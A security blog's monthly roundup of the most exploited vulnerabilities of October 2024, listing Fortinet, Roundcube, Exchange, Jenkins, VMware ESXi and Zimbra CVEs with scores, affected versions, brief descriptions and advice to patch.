Welcome to TheCyberThrone most exploited vulnerabilities review. This review is for the month of October 2024
CVE-2024-21762: Fortinet FortiOS: Out-of-bounds Write
CVSS 3.1 score : 9.8 CISA KEV : Yes
An out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows attacker to execute unauthorized code or commands via specifically crafted requests.
CVE-2023-27997: Fortinet FortiOS: Out-of-bounds Write
CVSS 3.1 score : 9.8 CISA KEV : Yes
A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.
CVE-2024-23113: Fortinet FortiOS: Use of Externally-Controlled Format String
CVSS 3.1 score : 9.8 CISA KEV : Yes
A use of externally-controlled format string in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, FortiPAM versions 1.2.0, 1.1.0 through 1.1.2, 1.0.0 through 1.0.3, FortiSwitchManager versions 7.2.0 through 7.2.3, 7.0.0 through 7.0.3 allows attacker to execute unauthorized code or commands via specially crafted packets. This issue arises due to the use of externally-controlled format strings, enabling attackers to execute unauthorized code or commands via specially crafted packets. Successful exploitation of this vulnerability could lead to serious security implications for organizations using these Fortinet products. Users are advised to update their systems as soon as possible to mitigate this risk.
CVE-2023-5631: Roundcube Improper Neutralization XSS
CVSS 3.1 score : 5.4 CISA KEV : Yes
A stored XSS vulnerability affecting Roundcube email client versions before 1.4.15, 1.5.x before 1.5.5, and 1.6.x before 1.6.4. An attacker can exploit this flaw by sending an HTML email with a crafted SVG document. The vulnerable component, rcube_washtml.php, fails to properly sanitize user-supplied data, allowing the attacker to inject and execute arbitrary JavaScript code upon victim’s interaction with the email. This could potentially lead to unauthorized account takeover, data theft, or further exploitation.
CVE-2023-43770 : Roundcube Webmail Vulnerability
CVSS 3.1 score : 6.1 CISA KEV : Yes
A vulnerability affecting Roundcube webmail versions before 1.4.14, 1.5.x before 1.5.4, and 1.6.x before 1.6.3. This issue allows Cross-Site Scripting (XSS) attacks through text/plain e-mail messages containing specially crafted links. The vulnerability lies in the behavior of Roundcube string replacer, located in program/lib/Roundcube/rcube_string_replacer.php, which fails to properly sanitize user input. Successful exploitation could result in the execution of malicious scripts within the webmail interface. Users are advised to update to the latest version as soon as possible to address this security risk.CVE-2024-26198: Microsoft Exchange Server Remote Code Execution Vulnerability.
CVE-2024-26198: Microsoft Exchange Server Remote Code Execution Vulnerability
CVSS 3.1 score : 8.8 CISA KEV : No
A remote code execution vulnerability affecting Microsoft Exchange Servers. An attacker can exploit this flaw by sending specially crafted emails to targets, potentially gaining control over the affected system. Successful exploitation could allow the attacker to install programs, view, change, or delete data, and create new accounts with full user rights. Organizations using Microsoft Exchange Server are advised to apply the available patches as soon as possible to mitigate this risk.
CVE-2024-23897: Jenkins Arbitrary file read vulnerability
CVSS 3.1 score : 9.8 CISA KEV : Yes
A vulnerability affecting Jenkins 2.441 and earlier, as well as LTS 2.426.2 and earlier. This issue lies in Jenkins’ CLI command parser, which fails to disable a feature that interprets ‘@’ followed by a file path in an argument as a command to read the file’s contents. As a result, unauthenticated attackers can exploit this vulnerability to read arbitrary files on the Jenkins controller file system. This can potentially lead to exposure of sensitive information. Jenkins users are advised to upgrade to a patched version as soon as possible to mitigate this risk.
CVE-2024-37085: VMware ESXi Active Directory Integration Authentication Bypass
CVSS 3.1 score : 7.2 CISA KEV : Yes
A vulnerability affecting VMware ESXi, a popular hypervisor for enterprise environments. The issue allows an attacker with sufficient Active Directory (AD) permissions to bypass authentication and gain unauthorized full access to an ESXi host. By recreating the configured AD group, ‘ESXi Admins’ by default, an attacker can exploit this vulnerability despite the group being deleted from AD.
CVE-2024-45519: Synacor Zimbra Collaboration Command Execution Vulnerability
CVSS 3.1 score : 10 CISA KEV : Yes
The postjournal service in Zimbra Collaboration (ZCS) before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1 sometimes allows unauthenticated users to execute commands.
CVE-2023-21529: Microsoft Exchange Server Remote Code Execution Vulnerability
CVSS 3.1 score : 8.8 CISA KEV : No
A critical vulnerability in Microsoft Exchange Server that enables remote code execution (RCE). This vulnerability affects multiple versions of Microsoft Exchange Server including 2013, 2016, and 2019. The flaw arises from improper handling of deserialization of untrusted data, leading to potential exploitation by malicious actors.
This brings end of this review security coverage. Thanks for visiting TheCyberThrone. If you like us please follow us on Facebook, Twitter, Instagram
